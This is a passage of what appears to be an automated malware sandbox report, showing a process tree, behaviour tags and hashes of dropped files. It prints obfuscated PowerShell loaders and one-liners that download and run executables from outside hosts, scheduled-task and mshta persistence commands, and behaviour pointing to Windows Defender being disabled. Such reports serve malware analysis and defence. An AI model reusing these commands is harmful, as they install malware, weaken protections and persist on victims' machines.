                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2276
                                • C:\Users\Admin\AppData\Local\Temp\1072399001\dDFw6mJ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1072399001\dDFw6mJ.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  PID:1768
                                  • C:\Windows\SYSTEM32\cmd.exe
                                    cmd.exe /c 67a27a89a5061.vbs
                                    7⤵
                                    • Checks computer location settings
                                    • Modifies registry class
                                    PID:3088
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67a27a89a5061.vbs"
                                      8⤵
                                      • Checks computer location settings
                                      PID:2960
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@FM@ZgBn@Go@ZwBq@Gs@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5008
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.Sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                          10⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4308
                                • C:\Users\Admin\AppData\Local\Temp\1072400101\bb53b2706a.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1072400101\bb53b2706a.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:4160
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c schtasks /create /tn 6LQBvmarfz5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\trFyeZ4RT.hta" /sc minute /mo 25 /ru "Admin" /f
                                    7⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3208
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /create /tn 6LQBvmarfz5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\trFyeZ4RT.hta" /sc minute /mo 25 /ru "Admin" /f
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2168
                                  • C:\Windows\SysWOW64\mshta.exe
                                    mshta C:\Users\Admin\AppData\Local\Temp\trFyeZ4RT.hta
                                    7⤵
                                    • Checks computer location settings
                                    • System Location Discovery: System Language Discovery
                                    PID:4444
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                      8⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Downloads MZ/PE file
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3916
                                      • C:\Users\Admin\AppData\Local\TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE
                                        "C:\Users\Admin\AppData\Local\TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE"
                                        9⤵
                                        • Modifies Windows Defender DisableAntiSpyware settings
                                        • Modifies Windows Defender Real-time Protection settings
                                        • Modifies Windows Defender TamperProtection settings
                                        • Modifies Windows Defender notification settings
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Windows security modification
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3620
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1072401021\am_no.cmd" "
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2616
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1072401021\am_no.cmd" any_word
                                    7⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3180
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 2
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      • Delays execution with timeout.exe
                                      PID:4936
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2844
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2060
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1788
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2852
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3340
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1464
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /create /tn "Lnzbxma67Tp" /tr "mshta \"C:\Temp\zRGpbMfKW.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4160
                                    • C:\Windows\SysWOW64\mshta.exe
                                      mshta "C:\Temp\zRGpbMfKW.hta"
                                      8⤵
                                      • Checks computer location settings
                                      • System Location Discovery: System Language Discovery
                                      PID:2172
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Downloads MZ/PE file
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1912
                                        • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                          "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                          10⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          PID:1736
                                • C:\Users\Admin\AppData\Local\Temp\1072402001\Fe36XBk.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1072402001\Fe36XBk.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Writes to the Master Boot Record (MBR)
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:2704
                                • C:\Users\Admin\AppData\Local\Temp\1072411001\dda6de0d95.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1072411001\dda6de0d95.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:3640
                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NkM0ODlEQUItRDM3NC00NzVDLTlDOTctOEQ0Q0YxQUZFNjZFfSIgdXNlcmlkPSJ7MTZGREIyMTYtQzZBNy00RjU0LTk5QUQtRTFBQkNEMEY4Rjg1fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7ODY2MzMxMkMtODNCNS00NjE2LThGOTItMEFEMkNFQkU1QjdBfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDY4ODkiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxOTM2NTgwOTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MDM0MjA1NzI1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
                        1⤵
                        • System Location Discovery: System Language Discovery
                        • System Network Configuration Discovery: Internet Connection Discovery
                        PID:1708
                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                        1⤵
                          PID:3340
                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          1⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1876
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                          1⤵
                            PID:976

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Temp\zRGpbMfKW.hta

                            Filesize

                            782B

                            MD5

                            16d76e35baeb05bc069a12dce9da83f9

                            SHA1

                            f419fd74265369666595c7ce7823ef75b40b2768

                            SHA256

                            456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

                            SHA512

                            4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

                          • C:\Users\Admin:.repos

                            Filesize

                            1.2MB

                            MD5

                            12c676ce651cc131804839aefecab260

                            SHA1

                            e6bbacc97bb925a2eecbfea4d2aaa191ef08ac00

                            SHA256

                            0daf04d613cc238c00809eaedbd92155fd4a9d20cc9b3a81207ae582df4d6afe

                            SHA512

                            2acabffd10d2cd8ac7451cdfe6f0b4f1b3e5e17f033ef3029cd2f7978d040deb1ad70144a5b099f8db0c4547221dd81590d0c3712c3a3e8cf8d806dab97f7806

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                            Filesize

                            2B

                            MD5

                            d751713988987e9331980363e24189ce

                            SHA1

                            97d170e1550eee4afc0af065b78cda302a97674c

                            SHA256

                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                            SHA512

                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

                            Filesize

                            14B

                            MD5

                            ef48733031b712ca7027624fff3ab208

                            SHA1

                            da4f3812e6afc4b90d2185f4709dfbb6b47714fa

                            SHA256

                            c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99

                            SHA512

                            ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                            Filesize

                            126KB

                            MD5

                            2f396541c1d69290fe92fc5074796a69

                            SHA1

                            efb9cf0760a11f8bd181cde7142d65c390d1828a

                            SHA256

                            8f2a4735f15ae53c78f4f5e988db0a5b6ab5c40d7f5dbb9628ae977a4f8e55b8

                            SHA512

                            69f3283e064a9fbb95b7270178e5d41f18ccb3a3531774b060489921e2326f39880bad7d0fad3a1c39abc5371d9a5a5c02147ab5eff1860df9354f0571260d64

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                            Filesize

                            2KB

                            MD5

                            25604a2821749d30ca35877a7669dff9

                            SHA1

                            49c624275363c7b6768452db6868f8100aa967be

                            SHA256

                            7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                            SHA512

                            206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                            Filesize

                            152B

                            MD5

                            75fc6fd984687a3b60604f8385d2d3ee

                            SHA1

                            47ca2cd71dfbddaf9fbdec9f9b4940d465bd40e9

                            SHA256

                            7f3c92d21167647ec0b45c9ed1163abd9a8d9199bc1d715edd58440ea1adc6ab

                            SHA512

                            cdeaa85deccb8ade6e361b47ee47a2fcf687f91e6105d2b250d6239eaefaaf40ce1f612dfcff132ade8bc497f9527429757ebf477092c8e10b16c6426971214a

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                            Filesize

                            152B

                            MD5

                            d93f6e4c57710d309e3397e058ad78f3

                            SHA1

                            0fbea33aed97992a22327797ad102e419b37e9cc

                            SHA256

                            3439987ffec3d9feb7a8943beb481ee0259199882b66b863fe70c9f7ecbc21c3

                            SHA512

                            2449fb3826e493fec6304cf48ccab992653be05799467c85f4327feb6446c4109057d08f57fd57a3c342ace8e3c74c887ce9a21112c25a8efbff7fe0ad5c757f

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                            Filesize

